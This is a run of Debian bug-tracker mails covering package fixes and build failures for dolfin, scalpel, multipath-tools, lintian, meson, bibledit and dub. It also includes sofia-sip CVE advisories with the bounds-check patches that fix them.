dolfin, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 1016...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Aurelien Jarno (supplier of updated dolfin package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Format: 1.8 Date: Thu, 11 Aug 2022 15:59:30 +0200 Source: dolfin Architecture: source Version: 2019.2.0~git20220407.d29e24d-5+nmu1 Distribution: unstable Urgency: medium Maintainer: Debian Science Team Changed-By: Aurelien Jarno Closes: 1016898 Changes: dolfin (2019.2.0~git20220407.d29e24d-5+nmu1) unstable; urgency=medium . * Non-maintainer upload. * No source change upload for glibc 2.34 changes, beside the extra libc-dev (>= 2.34) dependency. Closes: #1016898. Checksums-Sha1: ff7dab84d98f5f7de5474422e39493973cf39a43 3883 dolfin_2019.2.0~git20220407.d29e24d-5+nmu1.dsc dc717853e5cde36a5e21901fb9add0cac16f3bcc 44020 dolfin_2019.2.0~git20220407.d29e24d-5+nmu1.debian.tar.xz d1adf734a7831cd463287b573993940f5db812ff 17425 dolfin_2019.2.0~git20220407.d29e24d-5+nmu1_source.buildinfo Checksums-Sha256: 24c4f3ae23b96e0a053c1719167417b8153f2895135d28c9139bbd8cbde69d6a 3883 dolfin_2019.2.0~git20220407.d29e24d-5+nmu1.dsc 7644f28bf3409de3b489f207677ddaac839bb8e712034237eed58deb00b02760 44020 dolfin_2019.2.0~git20220407.d29e24d-5+nmu1.debian.tar.xz 19f1a80b79e11be2a29a002145a530e9e231079980d6e2a66e657a69d7336448 17425 dolfin_2019.2.0~git20220407.d29e24d-5+nmu1_source.buildinfo Files: d554d2b30f2ebe42b35b91ce700d4246 3883 math optional dolfin_2019.2.0~git20220407.d29e24d-5+nmu1.dsc c5e033e7c56efd9937048893ba8ce4b6 44020 math optional dolfin_2019.2.0~git20220407.d29e24d-5+nmu1.debian.tar.xz 7b598d30b555ee819d40f4d2cda8237c 17425 math optional dolfin_2019.2.0~git20220407.d29e24d-5+nmu1_source.buildinfo -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEUryGlb40+QrX1Ay4E4jA+JnoM2sFAmL1DScACgkQE4jA+Jno M2vOwQ/+MdGdg0Qq+qjYMQry1iZjva1KbN7azoe2P5vFXRZQjfd9WXe3z89vd/0I nYnCCtFTBiHeOSVbhS91adufF5QxghJSQiArEtWDmJ+pxj4MAXVsBSlTmEiq9cYS HWUp+S0MizGqyA/WdtvfhHdrT4UI29FfpNrSUM+Zy/UZ+p+AWTxB1O1GknYf3+81 WG+ZZv0Zfwrt9gAw+9kzX0xEpUuJlOK71qOJEtFalOwjvrlRQuelGyjPjYEhCpx3 TB97lJY1qG6NjZ2jY2hf031B3gf70Ur6TvgonVkgoLuX/G3xoXdvusLPf3LfuAPv sjvyq7rhcpCnRJpdsYXN5iEkptxzk2LoyFVcl7MAf8IQgycfkbtg6M0j+bBTZGsr 5M8lZsr9txQYzQwEQD1WcfGSmyEQ0S73yH70OXlFUs9AMVLYDQLPp8ZItOE//pmo iXq8Va7Q19phwUh0obMhYrUtNkdsbyJvEh08ADaJC3UoCNB0h8tYlOVkz+KlR0Rr Y7o9tmZOCnarMMW3gKybXghohZCH//a3g6wpig0H1gQfnx7792F2qoKOLtVmsDXa JxEcM9yAf5yCtW7T5Dgq77e4SjiRcSzQwO5gcuYDsf2/wX9/dE7CkeyHLzk0Xo+0 rYFHHZBbom5izawQb8eOU5V1+4kdUnbK23ShRBM8MzFUfRVjXf8= =mMrV -END PGP
Bug#1016560: marked as done (glibc 2.34 breaks scalpel autopkgtest on amd64: bash: line 1: 1961 Segmentation fault)
Your message dated Sat, 13 Aug 2022 14:36:31 + with message-id and subject line Bug#1016560: fixed in scalpel 1.60-9+nmu1 has caused the Debian Bug report #1016560, regarding glibc 2.34 breaks scalpel autopkgtest on amd64: bash: line 1: 1961 Segmentation fault to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1016560: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1016560 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: scalpel Version: 1.60-9 Severity: important Tags: upstream patch User: debian-gl...@lists.debian.org Usertags: glibc2.34 Dear maintainer, The autopkgtest of scalpel fails in sid on amd64 when that autopkgtest is run with the binary packages of glibc from experimental. It passes when run with only packages from sid. In tabular form: passfail glibcfrom sid2.34-0experimental5 scalpel from sid1.60-9 all others from sidfrom sid Here is the relevant part of the test log: autopkgtest [10:36:40]: test command1: scalpel -c debian/tests/scalpel.conf debian/tests/lua.img autopkgtest [10:36:40]: test command1: [--- Opening target "/tmp/autopkgtest-lxc.93yq46zi/downtmp/build.fXk/src/debian/tests/lua.img" bash: line 1: 1961 Segmentation fault bash -ec 'scalpel -c debian/tests/scalpel.conf debian/tests/lua.img' 2> >(tee -a /tmp/autopkgtest-lxc.93yq46zi/downtmp/command1-stderr >&2) > >(tee -a /tmp/autopkgtest-lxc.93yq46zi/downtmp/command1-stdout) The full test log is available there: https://ci.debian.net/data/autopkgtest/unstable/amd64/s/scalpel/24235565/log.gz After some debugging, I have found the issue to be a duplicate use of a va_list without using va_copy. Please find attached a patch to fix that. Regards Aurelien --- scalpel-1.60.orig/helpers.c +++ scalpel-1.60/helpers.c @@ -70,12 +70,14 @@ void setProgramName(char *s) { // write entry to both the screen and the audit file void scalpelLog(struct scalpelState *state, char *format, ...) { - va_list argp; + va_list argp, argp2; va_start(argp,format); + va_copy(argp2, argp); vfprintf (stderr,format,argp); - vfprintf (state->auditFile,format,argp); va_end(argp); + vfprintf (state->auditFile,format,argp2); + va_end(argp2); } // determine if two characters match, with optional case --- End Message --- --- Begin Message --- Source: scalpel Source-Version: 1.60-9+nmu1 Done: Aurelien Jarno We believe that the bug you reported is fixed in the latest version of scalpel, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 1016...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Aurelien Jarno (supplier of updated scalpel package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Format: 1.8 Date: Thu, 11 Aug 2022 15:45:53 +0200 Source: scalpel Architecture: source Version: 1.60-9+nmu1 Distribution: unstable Urgency: medium Maintainer: Debian Security Tools Changed-By: Aurelien Jarno Closes: 1016560 Changes: scalpel (1.60-9+nmu1) unstable; urgency=medium . * Non-maintainer upload. * debian/patches/60_va_copy.patch: fix the va_list usage in setProgramName(). (Closes: #1016560). Checksums-Sha1: 9b180b2965699ec068e841d7b69a319737578129 1913 scalpel_1.60-9+nmu1.dsc 2f296fff9832a0bd198a89cd40b13294045ff2b1 19720 scalpel_1.60-9+nmu1.debian.tar.xz 66f6f0aaac332762393e3ed20748382fe485ec1e 5713 scalpel_1.60-9+nmu1_source.buildinfo Checksums-Sha256: 9915b1228edd14b060f7cc422f39928f1d263bfc38091495478bd66f13dd542a 1913 scalpel_1.60-9+nmu1.dsc 9ada69180ee753acc684da46ddf7b166c310f5a0140192508b9e6fb5d38bc090 19720 scalpel_1.60-9+nmu1.debian.tar.xz 27312fe0b6629617770a1a4411330f12405c457e236426de1080764b1c72e50b 5713 scalpel_1.60-9+nmu1_source.buildinfo Files: f3d62760669d4e29ae7c0d7c9e820f63 1913 utils optional scalpel_1.60-9+nmu1.dsc fc20e15dfd34b5353ea003262136cddd 19720 utils optional scalpel_1.60-9+nmu1.debian.tar.xz 885b57b9e169f5736cdb2c819fb19e1b 5713 utils optional scalpel_1.60-9+nmu1_source.buildinfo -BEGIN PGP SIGNATURE-
Bug#979095: marked as done (Legally problematic GPL-3+ readline dependency)
Your message dated Sat, 13 Aug 2022 13:34:27 + with message-id and subject line Bug#979095: fixed in multipath-tools 0.9.0-4 has caused the Debian Bug report #979095, regarding Legally problematic GPL-3+ readline dependency to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 979095: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=979095 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Package: multipath-tools Severity: important This package depends on libreadline8 which is GPL-3+ licensed. According to debian/copyright parts of your package are GPL-2-only licensed. If that is also (transitively) the case for the binaries that link with libreadline.so.8 it might be legally problematic (see https://www.gnu.org/licenses/gpl-faq.html#AllCompatibility). There is an easy solution to the problem: Replacing the build dependency libreadline-dev with libeditreadline-dev links with the BSD-licensed libedit library which is a readline replacement. --- End Message --- --- Begin Message --- Source: multipath-tools Source-Version: 0.9.0-4 Done: Chris Hofstaedtler We believe that the bug you reported is fixed in the latest version of multipath-tools, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 979...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Chris Hofstaedtler (supplier of updated multipath-tools package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Format: 1.8 Date: Sat, 13 Aug 2022 13:08:06 + Source: multipath-tools Architecture: source Version: 0.9.0-4 Distribution: unstable Urgency: medium Maintainer: Debian DM Multipath Team Changed-By: Chris Hofstaedtler Closes: 979095 1016583 Changes: multipath-tools (0.9.0-4) unstable; urgency=medium . [ Chris Lamb ] * [3a71447] Make the build reproducible (Closes: #1016583) . [ Chris Hofstaedtler ] * [d815e6b] Use libedit instead of libreadline. Using patches from openSUSE, expected to go upstream in the next release. Thanks to Martin Wilck , Bastian Germann (Closes: #979095) * [f0e62a1] Add more patches from openSUSE to fix small bugs Checksums-Sha1: f1896cbca16bb85c54f894245057a9de6e74e18b 2572 multipath-tools_0.9.0-4.dsc 3c030aee7f87adc6aba649db307f842123f8d2d3 30280 multipath-tools_0.9.0-4.debian.tar.xz ee9685dcc4c56b2f5b2a357d2bd5ceb2ae48151a 7419 multipath-tools_0.9.0-4_source.buildinfo Checksums-Sha256: 623eb01853ad4e9f2984c2e8e444c1c5fa4318d86a44a8d753e65d5c4a324c56 2572 multipath-tools_0.9.0-4.dsc 71d575d186ef649e42f9d15b6cb22f4b08b5b710cf299e4b6ef6ab7bc232ee9a 30280 multipath-tools_0.9.0-4.debian.tar.xz e38d76694c75ca1265770210863b662c99348f74c71386b569a8311aff59479f 7419 multipath-tools_0.9.0-4_source.buildinfo Files: cc593ba806dbe89495476e8393ae7b3d 2572 admin optional multipath-tools_0.9.0-4.dsc 98aafe7baff1b42b9f8ff0ce7036ff32 30280 admin optional multipath-tools_0.9.0-4.debian.tar.xz 3b9d908688060bff49549f11f02cd280 7419 admin optional multipath-tools_0.9.0-4_source.buildinfo -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEfRrP+tnggGycTNOSXBPW25MFLgMFAmL3oxoACgkQXBPW25MF LgM66Q//YchIOV/A0GTcZ5mnTRR6lQvCexWNNx/6uLbTE5mdpZAKFsYmIOzTd3gl yQPLtwVvJRQ3I6FDQBkru1KtpvqQWIPCO8JZylydZqZazyDwIZivYClEWilIqsaD E17chn+TQ2A/09To9LPaZxlR9ls3kJMgozyLtu4EFI6ANSymR/pqF3KdNb+nzCXs ZzU2sTmhB2nFgMSXeFG0vc0cyKStmmJFHDqeylzPNBcLLg23PWwO5q1AKB8XjM5x C4UdkOFfNOvtNmuz3ajKfoKuxOeaX5kuXNmtAyva/iqbWfCjeB8GhohloulYTh9l A9QKG2rQ65MESfvE/+wQVTU5f8Grq5UQXo4Ex9gwXG0hrkcuUsAWFsrp8sYaiK0A rJxh+keWRFKnh8XTfzidgFuA7msbYzUU7PgKTiADHvL7g8HmF3UOLL/3pdrTShfV fw25cOYvptbXkFJPg4nGv5Jd9qBGdTdLNFHyS6EJFMeXEifN2N+5cxKff7O8e1Kx mfngOqd92aGRr5fImk2bCec+TFOyAHmjyqum7zVxapt5O5+i2V0eg2r7efCsSfzN SUWnjfHA/3dc05FRGpJXNlwvucXRKdHXpwoNrCgpsYzadY+Yq0TPzUkEmV90Ddms TA3zSMVaXCQvoWzofjRSCsnxZiboTIziH2DIL+h6jcSYwkroMrQ= =uOeO -END PGP SIGNATURE End Message ---
Processed: lintian: Please use slidding windows
Processing control commands: > severity -1 serious Bug #1014254 [lintian] lintian: Complex regular subexpression recursion limit (65534) exceeded at /usr/share/lintian/lib/Lintian/Check/Cruft.pm line 449. Bug #993613 [lintian] lintian: Complex regular subexpression recursion limit exceeded in cruft check Bug #996837 [lintian] lintian displays errors when checking webpack 5.58 Severity set to 'serious' from 'important' Severity set to 'serious' from 'important' Severity set to 'serious' from 'important' > tags -1 security Bug #1014254 [lintian] lintian: Complex regular subexpression recursion limit (65534) exceeded at /usr/share/lintian/lib/Lintian/Check/Cruft.pm line 449. Bug #993613 [lintian] lintian: Complex regular subexpression recursion limit exceeded in cruft check Bug #996837 [lintian] lintian displays errors when checking webpack 5.58 Added tag(s) security. Added tag(s) security. Added tag(s) security. -- 1014254: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1014254 993613: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=993613 996837: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=996837 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#1017087: meson: All ldc related packages FTBFS with 0.63.1-1
Package: meson Version: 0.63.1-1 Severity: serious X-Debbugs-Cc: jpakk...@gmail.com Hi, On building any d-lang package (which uses ldc in build) with new meson, it goes FTBFS with errors similar to the one pasted below. This was working fine just minutes before (with meson 0.63.0) Tried with packages: gir-to-d, diet-ng, sambamba Seems meson is enforcing some flags? | cd obj-x86_64-linux-gnu && LC_ALL=C.UTF-8 meson .. --wrap-mode=nodownload --buildtype=plain --prefix=/usr --sysconfdir=/etc --localstatedir=/var --libdir=lib/x86_64-linux-gnu | The Meson build system | Version: 0.63.1 | Source dir: /<> | Build dir: /<>/obj-x86_64-linux-gnu | Build type: native build | Project name: GIR-to-D | Project version: 0.19.1 | | ../meson.build:1:0: ERROR: Unable to detect linker for compiler `ldc2 -L=--version /tmp/tmp9o4k_f0e.d -Wl,-z,relro -O -g -release -wi --allinst` | stdout: | stderr: ldc2: Unknown command line argument '-Wl,-z,relro'. Try: 'ldc2 --help' | ldc2: Did you mean '--icp-lto'? -- System Information: Debian Release: bookworm/sid APT prefers testing APT policy: (990, 'testing'), (500, 'unstable') Architecture: amd64 (x86_64) Kernel: Linux 5.18.0-3-amd64 (SMP w/8 CPU threads; PREEMPT) Kernel taint flags: TAINT_WARN, TAINT_OOT_MODULE, TAINT_UNSIGNED_MODULE Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), LANGUAGE not set Shell: /bin/sh linked to /usr/bin/dash Init: systemd (via /run/systemd/system) LSM: AppArmor: enabled Versions of packages meson depends on: pn ninja-build ii python33.10.5-3 ii python3-pkg-resources 59.6.0-1.2 ii python3-setuptools 59.6.0-1.2 Versions of packages meson recommends: ii dpkg-dev 1.21.9 meson suggests no packages.
Bug#1016974: marked as done (sofia-sip: CVE-2022-31001 CVE-2022-31002 CVE-2022-31003)
Your message dated Sat, 13 Aug 2022 12:19:12 + with message-id and subject line Bug#1016974: fixed in sofia-sip 1.12.11+20110422.1+1e14eea~dfsg-3 has caused the Debian Bug report #1016974, regarding sofia-sip: CVE-2022-31001 CVE-2022-31002 CVE-2022-31003 to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1016974: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1016974 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: sofia-sip X-Debbugs-CC: t...@security.debian.org Severity: grave Tags: security Hi, The following vulnerabilities were published for sofia-sip. CVE-2022-31001[0]: | Sofia-SIP is an open-source Session Initiation Protocol (SIP) User- | Agent library. Prior to version 1.13.8, an attacker can send a message | with evil sdp to FreeSWITCH, which may cause crash. This type of crash | may be caused by `#define MATCH(s, m) (strncmp(s, m, n = sizeof(m) - | 1) == 0)`, which will make `n` bigger and trigger out-of-bound access | when `IS_NON_WS(s[n])`. Version 1.13.8 contains a patch for this | issue. https://github.com/freeswitch/sofia-sip/security/advisories/GHSA-79jq-hh82-cv9g https://github.com/freeswitch/sofia-sip/commit/a99804b336d0e16d26ab7119d56184d2d7110a36 (v1.13.8) CVE-2022-31002[1]: | Sofia-SIP is an open-source Session Initiation Protocol (SIP) User- | Agent library. Prior to version 1.13.8, an attacker can send a message | with evil sdp to FreeSWITCH, which may cause a crash. This type of | crash may be caused by a URL ending with `%`. Version 1.13.8 contains | a patch for this issue. https://github.com/freeswitch/sofia-sip/security/advisories/GHSA-g3x6-p824-x6hm https://github.com/freeswitch/sofia-sip/commit/51841eb53679434a386fb2dcbca925dcc48d58ba (v1.13.8) CVE-2022-31003[2]: | Sofia-SIP is an open-source Session Initiation Protocol (SIP) User- | Agent library. Prior to version 1.13.8, when parsing each line of a | sdp message, `rest = record + 2` will access the memory behind `\0` | and cause an out-of-bounds write. An attacker can send a message with | evil sdp to FreeSWITCH, causing a crash or more serious consequence, | such as remote code execution. Version 1.13.8 contains a patch for | this issue. https://github.com/freeswitch/sofia-sip/security/advisories/GHSA-8w5j-6g2j-pxcp https://github.com/freeswitch/sofia-sip/commit/907f2ac0ee504c93ebfefd676b4632a3575908c9 (v1.13.8) If you fix the vulnerabilities please also make sure to include the CVE (Common Vulnerabilities & Exposures) ids in your changelog entry. For further information see: [0] https://security-tracker.debian.org/tracker/CVE-2022-31001 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31001 [1] https://security-tracker.debian.org/tracker/CVE-2022-31002 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31002 [2] https://security-tracker.debian.org/tracker/CVE-2022-31003 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31003 Please adjust the affected versions in the BTS as needed. --- End Message --- --- Begin Message --- Source: sofia-sip Source-Version: 1.12.11+20110422.1+1e14eea~dfsg-3 Done: Evangelos Ribeiro Tzaras We believe that the bug you reported is fixed in the latest version of sofia-sip, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 1016...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Evangelos Ribeiro Tzaras (supplier of updated sofia-sip package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Format: 1.8 Date: Sat, 13 Aug 2022 04:34:27 +0200 Source: sofia-sip Architecture: source Version: 1.12.11+20110422.1+1e14eea~dfsg-3 Distribution: unstable Urgency: medium Maintainer: Debian VoIP Team Changed-By: Evangelos Ribeiro Tzaras Closes: 1016974 Changes: sofia-sip (1.12.11+20110422.1+1e14eea~dfsg-3) unstable; urgency=medium . * Add patches to fix reported CVEs. For further information see: - CVE-2022-31001[0]: - CVE-2022-31002[1]: - CVE-2022-31003[2]: [0] https://security-tracker.debian.org/tracker/CVE-2022-31001 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31001 [1]
Bug#1016974: sofia-sip: CVE-2022-31001 CVE-2022-31002 CVE-2022-31003
control -1 tags patch Hi, I'm not quite sure which is the preferred form to supply a patch, so I'll attach a `git format-patch` based on my `wip/cve` branch on salsa [0]. If for further discussions should be needed before this can be uploaded or the patch in a different form is preffered, please give me a shout. [0] https://salsa.debian.org/devrtz/sofia-sip/-/tree/wip/cve -- Cheers, Evangelos PGP: B938 6554 B7DD 266B CB8E 29A9 90F0 C9B1 8A6B 4A19 From 3687228cab738c9819bd82f6e171180e19b50c19 Mon Sep 17 00:00:00 2001 From: Evangelos Ribeiro Tzaras Date: Sat, 13 Aug 2022 04:24:34 +0200 Subject: [PATCH 1/2] Add patches to fix reported CVEs; add copyright of patches MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit closes: bug#1016974, thanks Moritz Mühlenhoff! For further information see: - CVE-2022-31001[0]: - CVE-2022-31002[1]: - CVE-2022-31003[2]: [0] https://security-tracker.debian.org/tracker/CVE-2022-31001 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31001 [1] https://security-tracker.debian.org/tracker/CVE-2022-31002 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31002 [2] https://security-tracker.debian.org/tracker/CVE-2022-31003 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31003 --- debian/copyright | 18 .../1003-cve-fix-oob-read-sip_method_d.patch | 28 .../1004-cve-fix-oob-read-url_canonize.patch | 45 +++ .../1005-cve-fix-heap-overflow-by-two.patch | 39 debian/patches/series | 3 ++ 5 files changed, 133 insertions(+) create mode 100644 debian/patches/1003-cve-fix-oob-read-sip_method_d.patch create mode 100644 debian/patches/1004-cve-fix-oob-read-url_canonize.patch create mode 100644 debian/patches/1005-cve-fix-heap-overflow-by-two.patch diff --git a/debian/copyright b/debian/copyright index e9c3efcf..a6b1642e 100644 --- a/debian/copyright +++ b/debian/copyright @@ -245,6 +245,24 @@ License-Grant: License: GPL-3+ Reference: debian/copyright +Files: + debian/patches/1003* + debian/patches/1004* + debian/patches/1005* +Copyright: + 2022 Andrey Volk +License-Grant: + This library is free software; + you can redistribute it and/or modify it + under the terms of the GNU Lesser General Public License + as published by the Free Software Foundation; + either version 2.1 of the License, + or (at your option) any later version. +License-Grant: + Licensed under LGPL. + See file COPYING. +License: LGPL-2.1+ + License: BSD-3-clause Redistribution and use in source and binary forms, with or without modification, diff --git a/debian/patches/1003-cve-fix-oob-read-sip_method_d.patch b/debian/patches/1003-cve-fix-oob-read-sip_method_d.patch new file mode 100644 index ..d6e12d1d --- /dev/null +++ b/debian/patches/1003-cve-fix-oob-read-sip_method_d.patch @@ -0,0 +1,28 @@ +From: Andrey Volk +Commit: e96b4b89fc37a074bc95fc8fc24bb4b5297048ad +Date: Mon, 18 Apr 2022 17:11:26 +0300 +Subject: Fix Out-of-bound read in sip_method_d + +Bug: https://security-tracker.debian.org/tracker/CVE-2022-31001 +Bug-Debian: https://bugs.debian.org/1016974 + +Last-Update: 2022-08-13 +--- + libsofia-sip-ua/sip/sip_parser.c | 4 + 1 file changed, 4 insertions(+) + +diff --git a/libsofia-sip-ua/sip/sip_parser.c b/libsofia-sip-ua/sip/sip_parser.c +index 3a4593d..b94be9b 100644 +--- a/libsofia-sip-ua/sip/sip_parser.c b/libsofia-sip-ua/sip/sip_parser.c +@@ -413,6 +413,10 @@ sip_method_t sip_method_d(char **ss, char const **return_name) + + #undef MATCH + ++ if (strlen(s) < n) { ++return sip_method_invalid; ++ } ++ + if (IS_NON_WS(s[n])) + /* Unknown method */ + code = sip_method_unknown; diff --git a/debian/patches/1004-cve-fix-oob-read-url_canonize.patch b/debian/patches/1004-cve-fix-oob-read-url_canonize.patch new file mode 100644 index ..46a3b030 --- /dev/null +++ b/debian/patches/1004-cve-fix-oob-read-url_canonize.patch @@ -0,0 +1,45 @@ +From: Andrey Volk +Commit: 32a209f00763d4e506ed68ab68ffea3ead9cc8de +Date: Mon, 18 Apr 2022 17:22:55 +0300 +Subject: Fix Out-of-bound read in url_canonize2 and url_canonize3 + +Bug: https://security-tracker.debian.org/tracker/CVE-2022-31002 +Bug-Debian: https://bugs.debian.org/1016974 + +Last-Update: 2022-08-13 +--- + libsofia-sip-ua/url/url.c | 14 -- + 1 file changed, 12 insertions(+), 2 deletions(-) + +diff --git a/libsofia-sip-ua/url/url.c b/libsofia-sip-ua/url/url.c +index 7df6ab0..b379562 100644 +--- a/libsofia-sip-ua/url/url.c b/libsofia-sip-ua/url/url.c +@@ -364,7 +364,12 @@ char *url_canonize2(char *d, char const * const s, size_t n, + continue; + } + +-h1 = s[i + 1], h2 = s[i + 2]; ++h1 = s[i + 1]; ++if (!h1) { ++*d = '\0'; ++return NULL; ++} ++h2 = s[i + 2]; + + if (!IS_HEX(h1) || !IS_HEX(h2)) { + *d = '\0'; +@@ -422,7 +427,12 @@ char *url_canonize3(char
Bug#1017083: bibledit: Some sources are not included in your package
Source: bibledit Version: 5.0.983-1 Severity: serious Tags: upstream ftbfs security Justification: DFSG #2 X-Debbugs-Cc: Debian Security Team , debian...@lists.debian.org Dear Maintainer, Your package includes some files that seem to lack sources in preferred forms of modification: # Several minified Javascript objects are included. Upstream did this intentionally. There is several minifiers, like YUI, Uglify.JS, and others. Each of them employs their own algorithms to makes the source smaller. Upstream included the minified versions provided by the developers. This way they are more sure to have well-tested and reliable minified objects. [jquery/jquery-3.5.1.min.js] # Several minified Javascript objects are included. Upstream did this intentionally. There is several minifiers, like YUI, Uglify.JS, and others. Each of them employs their own algorithms to makes the source smaller. Upstream included the minified versions provided by the developers. This way they are more sure to have well-tested and reliable minified objects. [jquery/jquery.touchSwipe.min.js] # Several minified Javascript objects are included. Upstream did this intentionally. There is several minifiers, like YUI, Uglify.JS, and others. Each of them employs their own algorithms to makes the source smaller. Upstream included the minified versions provided by the developers. This way they are more sure to have well-tested and reliable minified objects. [nicedit/nicedit.min.js] # Several minified Javascript objects are included. Upstream did this intentionally. There is several minifiers, like YUI, Uglify.JS, and others. Each of them employs their own algorithms to makes the source smaller. Upstream included the minified versions provided by the developers. This way they are more sure to have well-tested and reliable minified objects. [notifit/notifit.min.js] # Several minified Javascript objects are included. Upstream did this intentionally. There is several minifiers, like YUI, Uglify.JS, and others. Each of them employs their own algorithms to makes the source smaller. Upstream included the minified versions provided by the developers. This way they are more sure to have well-tested and reliable minified objects. [quill/1.1.5/quill.core.js] # Several minified Javascript objects are included. Upstream did this intentionally. There is several minifiers, like YUI, Uglify.JS, and others. Each of them employs their own algorithms to makes the source smaller. Upstream included the minified versions provided by the developers. This way they are more sure to have well-tested and reliable minified objects. [quill/1.1.5/quill.js] # Several minified Javascript objects are included. Upstream did this intentionally. There is several minifiers, like YUI, Uglify.JS, and others. Each of them employs their own algorithms to makes the source smaller. Upstream included the minified versions provided by the developers. This way they are more sure to have well-tested and reliable minified objects. [quill/1.1.5/quill.min.js] # Several minified Javascript objects are included. Upstream did this intentionally. There is several minifiers, like YUI, Uglify.JS, and others. Each of them employs their own algorithms to makes the source smaller. Upstream included the minified versions provided by the developers. This way they are more sure to have well-tested and reliable minified objects. [quill/1.3.6/quill.core.js] # Several minified Javascript objects are included. Upstream did this intentionally. There is several minifiers, like YUI, Uglify.JS, and others. Each of them employs their own algorithms to makes the source smaller. Upstream included the minified versions provided by the developers. This way they are more sure to have well-tested and reliable minified objects. [quill/1.3.6/quill.js] # Several minified Javascript objects are included. Upstream did this intentionally. There is several minifiers, like YUI, Uglify.JS, and others. Each of them employs their own algorithms to makes the source smaller. Upstream included the minified versions provided by the developers. This way they are more sure to have well-tested and reliable minified objects. [quill/1.3.6/quill.min.js] # Several minified Javascript objects are included. Upstream did this intentionally. There is several minifiers, like YUI, Uglify.JS, and others. Each of them employs their own algorithms to makes the source smaller. Upstream included the minified versions provided by the developers. This way they are more sure to have well-tested and reliable minified objects. [quill/quill.core.js] # Several minified Javascript objects are included. Upstream did this intentionally. There is several minifiers, like YUI, Uglify.JS, and others. Each of them employs their own algorithms to makes the source smaller. Upstream included the minified versions provided by the
Bug#1012914: marked as done (dub: ftbfs with GCC-12)
Your message dated Sat, 13 Aug 2022 11:03:54 + with message-id and subject line Bug#1012914: fixed in dub 1.27.0-3 has caused the Debian Bug report #1012914, regarding dub: ftbfs with GCC-12 to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1012914: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1012914 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Package: src:dub Version: 1.27.0-2 Severity: normal Tags: sid bookworm User: debian-...@lists.debian.org Usertags: ftbfs-gcc-12 [This bug is targeted to the upcoming bookworm release] Please keep this issue open in the bug tracker for the package it was filed for. If a fix in another package is required, please file a bug for the other package (or clone), and add a block in this package. Please keep the issue open until the package can be built in a follow-up test rebuild. The package fails to build in a test rebuild on at least amd64 with gcc-12/g++-12, but succeeds to build with gcc-11/g++-11. The severity of this report will be raised before the bookworm release. The full build log can be found at: http://qa-logs.debian.net/2022/06/09/gcc12/dub_1.27.0-2_unstable_gcc12.log The last lines of the build log are at the end of this report. To build with GCC 11, either set CC=gcc-11 CXX=g++-11 explicitly, or install the gcc, g++, gfortran, ... packages from experimental. apt-get -t=experimental install g++ Common build failures are new warnings resulting in build failures with -Werror turned on, or new/dropped 